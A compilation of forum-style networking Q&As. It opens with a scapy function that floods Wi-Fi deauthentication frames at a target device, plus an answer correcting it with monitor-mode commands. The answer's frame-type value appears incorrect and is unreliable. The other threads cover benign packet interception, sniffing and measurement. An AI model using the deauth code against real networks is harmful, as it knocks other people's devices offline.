Hi I'm coming towards you cause I'm currently coding a framework for LAN attack to understand better how it works, and I want to add a deauth attack. Here is the code of the function, but it doesn't work and I do not understand what is wrong.
def disconnect(self):
target_mac = self.t_mac
gw_mac = self.gw_mac # gateway mac address
dot11 = Dot11(type=0, addr1=target_mac, addr2=gw_mac, addr3=gw_mac)
pkt = RadioTap()/dot11/Dot11Deauth(reason=7)
scapy.sendp(pkt, inter=0.1, count=1000, verbose=0)
I am on Windows 10, and analysis the exchange with wireshark.
The packet seems really weird on wireshark.
Hope you can give me some information to help.
Thanks in advance guys ;)
Packet Wireshark Dot11
A Dot11 packet with type 8 and subtype 12 is a Dot11Deauth packet.
So, when you define dot11 try this:
dot11 = Dot11(type=8, subtype=12, addr1=target_mac, addr2=gw_mac, addr3=gw_mac)
Also, try to put your interface in monitor mode and make sure to use a wireless interface (like wlan0, wlan1 and not eth0 wich is ethernet).
Run in shell this commands:
ifconfig <IFACE> down
iwconfig <IFACE> mode monitor
ifconfig <IFACE> up
where IFACE is the interface you want to use. Just run ifconfig to check wich one is available.
Related
I want to sniff some packets, and if the packet meet some conditions(etc. dst ip = 'xxx') , i want to discard it. Something like firewall.
I am trying use scapy.
sniff
I expect I can stop the original packet from src A to scr B if the packet meets the condition
You can't do that using Scapy.
You will need to use:
On Unix: use netfilterqueue along Scapy, similar to Modify with scapy and netfilterqueue
On Windows: your best bet is Windivert (watch out: pydivert doesn't work with the last version. You might want to fix it yourself :/)
In fact, Scapy only receives packets after they went through the OS. It won't be able to discard them. The softwares listed above use tricks to catch them beforehand
This is my first time using raw sockets (yes, I need to use them as I must modify a field inside a network header) and all the documentation or tutorials I read describe a solution to sniff packets but that is not exactly what I need. I need to create a script which intercepts the packet, process it and sends it further to the destination, i.e. the packets should not reach the destination unless my script decides to.
In order to learn, I created a small prototype which detects pings and just prints "PING". I would expect ping not to work as I intercept the packets and I don't include the logic to send them to its destination. However ping is working (again, it seems as it is just sniffing/mirroring packets). My goal is that the ping packets are "trapped" in my script and I don't know how to do that. This is what I do in my current python script (I avoid writing how I do the decode for simplicity)
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
sock.bind((eth0, 0))
packet = sock.recvfrom(65565)
decode_eth(packet)
decode_ip(packet)
if (ipheader.ip_proto == 1):
print("\nPING")
Can somebody explain how can I achieve my goal or point me to the right documentation?
Your description seems to be different from what your title suggest. My understanding is that you want to receive, modify and possibly drop incoming network packets. And this is to be done on Linux. In that case I suggest you use a netfilter prerouting hook, which will make things a lot simpler (and likely more stable). Netfilter is well documented, a nice overview including information related to your requirements can be seen here. The important function to use is nf_register_hook(), read the answer to this question to get an idea of how to set things up.
I suppose that your Linux box is configured as a router (not a bridge). The packet will pass through your Linux because you have enabled IP Forwarding. So there are two solution:
Solution 1:
Disable IP Forwarding and then receive the packet from one interface and do the appropriate task (forwarding to another interface or dropping it).
Solution 2:
Use NetFilterQueue.
Install it on your Linux box (Debian/Ubuntu in my example):
apt-get install build-essential python-dev libnetfilter-queue-dev
Use iptables to send packets coming from input interface (eth0 in my example):
iptables -I INPUT -i eth0 -j NFQUEUE --queue-num 1
Run this script to handle packets forwarded to the Queue No.1 :
from netfilterqueue import NetfilterQueue
def print_and_accept(pkt):
print pkt
pkt.accept()
nfqueue = NetfilterQueue()
nfqueue.bind(1, print_and_accept)
try:
nfqueue.run()
except KeyboardInterrupt:
print
Note that pkt.drop() cause dropping the packet. Also you should accept/drop every packet.
I'm trying to use a wlan adapter (TP-link TL-WN722N) in monitor mode to pick up RSS from signals in the environment (both beacons and clients). What I would like to do is to get the MAC address and RSS value into my own code somehow (preferably python). I'm planning to use these values for a rough estimate of locations of nearby devices.
I've looked into scapy, but it does not seem to provide RSS values.
tcpdump seems to be able to get both values, but I have been unable to catch client devices.
Is it possible?
If so can I filter MAC and RSS somehow?
I got it working with tcpdump!
To setup a monitor mode adapter, you first need to check which interface to use:
iw list
Select the correct phy (for me its phy1) and create an adapter (I called it moni0):
sudo iw phy phy1 interface add moni0 type monitor
Then add your adapter to the ifconfig:
sudo ifconfig moni0 up
See this guide for more details.
I used the following params for tcpdump to get the values that I needed. (you can pipe the output to your program, main.py in my case):
sudo tcpdump -n -e -tttt -vvvv -i moni0 | python main.py
You can find my project here.
i'm trying to get the TX re-transmission amount for a specific network interface on a Linux 2.6.33.3 kernel.
is there any Linux raw data i can use in order to get/calculate this kind of information?
i've tried netstat, but i couldn't find a way to get the retransmissions value for a specific interface.
with no other "quick" choice, what would it require from me in order to build a small app especially for that? listen to all outgoing packets using any capturing library and count.. what? duplicate packets? by some kind of a packet id?
i'm not a network pro.. am i suppose to find troubles in this kind of mission? (btw, i'll probably try to do it with python. any reason why not to?)
You can check how your interface is configured with the following commands:
mii-tool eth0
ethtool eth0
mii-diag eth0
Not all of them are installed by default in any Linux system, but they are definitely in the distributive and installable.
When you want to measure, how fast is your interface really, you can use dd + netcat:
host1$ cat /dev/zero | nc -l -p 3000
host2$ nc host1 3000 | dd of=/dev/null
^C
dd will write you with which speed was the retransmission between host1 and host2.
If you want per interface, try ifconfig eth0, you probably have what you want there. Just parse it through python.
I'd need to sniff on an interface BPDU (bridge protocol data unit) packets which are encapsulated in eth frames of type 802.3 with LLC header. I tried to open a socket raw:
skd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_802_3))
but trying to sniff packets i can't catch them. Looking at include/linux/if_ether.h seems that ETH_P_802_3 was a dummy type...is there a solution or i should use ETH_P_ALL and analize the EtherType field of the ethernet header?
Thank you all!
Sorry, I'm not sure if your question is regarding the ETH_P_ALL flag or if your sniffer simply doesn't work.
I would recommend using ETH_P_ALL and decoding the headers yourself.
If your sniffers not working, make sure that you have promiscuous mode on? From the command line, you can use ifconfig eth0 promisc, assuming your ethernet device is eth0. Or you can set the IFF_PROMISC flag on your device using ioctl.
All that said, unless you have a good reason not to, it's probably strongly worth your while to not reinvent the wheel and simply use libpcap.